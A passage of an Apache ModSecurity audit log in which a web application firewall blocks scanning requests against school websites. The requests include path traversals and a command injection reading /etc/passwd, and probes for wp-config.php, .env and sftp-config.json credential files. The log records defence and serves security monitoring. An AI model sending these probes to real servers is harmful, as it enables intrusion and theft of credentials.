Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81e53329-Z-- --6cb0dd67-A-- [16/May/2025:15:40:59 +0700] aCb6G9hEtho3ciA0weghjwAAAIQ 103.236.140.4 47686 103.236.140.4 8181 --6cb0dd67-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6cb0dd67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cb0dd67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384859576033 822 (- - -) Stopwatch2: 1747384859576033 822; combined=314, p1=280, p2=0, p3=0, p4=0, p5=34, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cb0dd67-Z-- --a7990a49-A-- [16/May/2025:15:41:01 +0700] aCb6HdhEtho3ciA0weghmQAAAJI 103.236.140.4 47706 103.236.140.4 8181 --a7990a49-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a7990a49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7990a49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384861538854 694 (- - -) Stopwatch2: 1747384861538854 694; combined=243, p1=214, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7990a49-Z-- --bd52a12b-A-- [16/May/2025:15:41:01 +0700] aCb6HdhEtho3ciA0weghmgAAAJU 103.236.140.4 47708 103.236.140.4 8181 --bd52a12b-B-- GET /resources/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bd52a12b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd52a12b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384861732511 790 (- - -) Stopwatch2: 1747384861732511 790; combined=304, p1=266, p2=0, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd52a12b-Z-- --bc4ee848-A-- [16/May/2025:15:41:02 +0700] aCb6HthEtho3ciA0weghnAAAAJY 103.236.140.4 47712 103.236.140.4 8181 --bc4ee848-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --bc4ee848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc4ee848-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384862125708 2276 (- - -) Stopwatch2: 1747384862125708 2276; combined=794, p1=370, p2=397, p3=0, p4=0, p5=26, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc4ee848-Z-- --4d9cf44d-A-- [16/May/2025:15:41:04 +0700] aCb6INhEtho3ciA0weghpwAAAJM 103.236.140.4 47736 103.236.140.4 8181 --4d9cf44d-B-- GET /ftp.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4d9cf44d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d9cf44d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384864286119 1808 (- - -) Stopwatch2: 1747384864286119 1808; combined=728, p1=327, p2=374, p3=0, p4=0, p5=26, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d9cf44d-Z-- --a8b8d801-A-- [16/May/2025:15:41:05 +0700] aCb6IdhEtho3ciA0weghrAAAAJc 103.236.140.4 47750 103.236.140.4 8181 --a8b8d801-B-- GET /ftps.config HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a8b8d801-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8b8d801-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384865266478 1536 (- - -) Stopwatch2: 1747384865266478 1536; combined=624, p1=304, p2=292, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8b8d801-Z-- --df74ef04-A-- [16/May/2025:15:41:05 +0700] aCb6Ice47ocjCGWTS4b7SwAAAEY 103.236.140.4 47752 103.236.140.4 8181 --df74ef04-B-- GET /ftp-config.conf HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --df74ef04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df74ef04-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||up.smkn22jakarta.sch.id|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384865461807 1740 (- - -) Stopwatch2: 1747384865461807 1740; combined=665, p1=323, p2=316, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df74ef04-Z-- --6294e159-A-- [16/May/2025:15:41:05 +0700] aCb6IdhEtho3ciA0weghrwAAAIM 103.236.140.4 47758 103.236.140.4 8181 --6294e159-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --6294e159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6294e159-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384865738846 745 (- - -) Stopwatch2: 1747384865738846 745; combined=268, p1=238, p2=0, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6294e159-Z-- --4de8111b-A-- [16/May/2025:15:41:05 +0700] aCb6IUE0LfP59mkCzg73dAAAANE 103.236.140.4 47760 103.236.140.4 8181 --4de8111b-B-- GET /prevlaravel/sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4de8111b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4de8111b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384865851980 722 (- - -) Stopwatch2: 1747384865851980 722; combined=288, p1=251, p2=0, p3=0, p4=0, p5=36, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4de8111b-Z-- --cfa81543-A-- [16/May/2025:15:41:06 +0700] aCb6Ite6THFz1hsaJaKRjQAAAAA 103.236.140.4 47762 103.236.140.4 8181 --cfa81543-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --cfa81543-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfa81543-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384866046120 717 (- - -) Stopwatch2: 1747384866046120 717; combined=280, p1=244, p2=0, p3=0, p4=0, p5=35, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfa81543-Z-- --f36ebf59-A-- [16/May/2025:15:41:08 +0700] aCb6JNhEtho3ciA0weghsgAAAIc 103.236.140.4 47790 103.236.140.4 8181 --f36ebf59-B-- GET /api/.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f36ebf59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f36ebf59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384868323151 680 (- - -) Stopwatch2: 1747384868323151 680; combined=263, p1=235, p2=0, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f36ebf59-Z-- --77201921-A-- [16/May/2025:15:41:09 +0700] aCb6Jde6THFz1hsaJaKRkwAAAAQ 103.236.140.4 47806 103.236.140.4 8181 --77201921-B-- GET /.env.save HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --77201921-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77201921-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384869670298 694 (- - -) Stopwatch2: 1747384869670298 694; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77201921-Z-- --d67fb138-A-- [16/May/2025:15:41:10 +0700] aCb6Jte6THFz1hsaJaKRmAAAAAk 103.236.140.4 47816 103.236.140.4 8181 --d67fb138-B-- GET /.env.prod HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d67fb138-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d67fb138-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384870437146 661 (- - -) Stopwatch2: 1747384870437146 661; combined=266, p1=241, p2=0, p3=0, p4=0, p5=25, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d67fb138-Z-- --4630940f-A-- [16/May/2025:15:41:16 +0700] aCb6LNe6THFz1hsaJaKRuwAAABE 103.236.140.4 47888 103.236.140.4 8181 --4630940f-B-- GET /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4630940f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4630940f-E-- --4630940f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vendor/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747384876640704 1198 (- - -) Stopwatch2: 1747384876640704 1198; combined=349, p1=237, p2=93, p3=0, p4=0, p5=19, sr=49, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4630940f-Z-- --c9fe1908-A-- [16/May/2025:15:41:16 +0700] aCb6LNe6THFz1hsaJaKRvAAAABU 103.236.140.4 47890 103.236.140.4 8181 --c9fe1908-B-- GET /download_video.php?path=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c9fe1908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9fe1908-E-- --c9fe1908-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /download_video.php?path=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384876834900 1377 (- - -) Stopwatch2: 1747384876834900 1377; combined=455, p1=340, p2=89, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9fe1908-Z-- --ed49833e-A-- [16/May/2025:15:41:17 +0700] aCb6Lde6THFz1hsaJaKRvQAAABM 103.236.140.4 47892 103.236.140.4 8181 --ed49833e-B-- GET /index.php?page=../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ed49833e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed49833e-E-- --ed49833e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?page=../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747384877029326 1553 (- - -) Stopwatch2: 1747384877029326 1553; combined=425, p1=308, p2=91, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed49833e-Z-- --2fd56a13-A-- [16/May/2025:15:41:17 +0700] aCb6Lde6THFz1hsaJaKRvgAAAAA 103.236.140.4 47894 103.236.140.4 8181 --2fd56a13-B-- GET /php/ping.php?cmd=cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2fd56a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2fd56a13-E-- --2fd56a13-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg 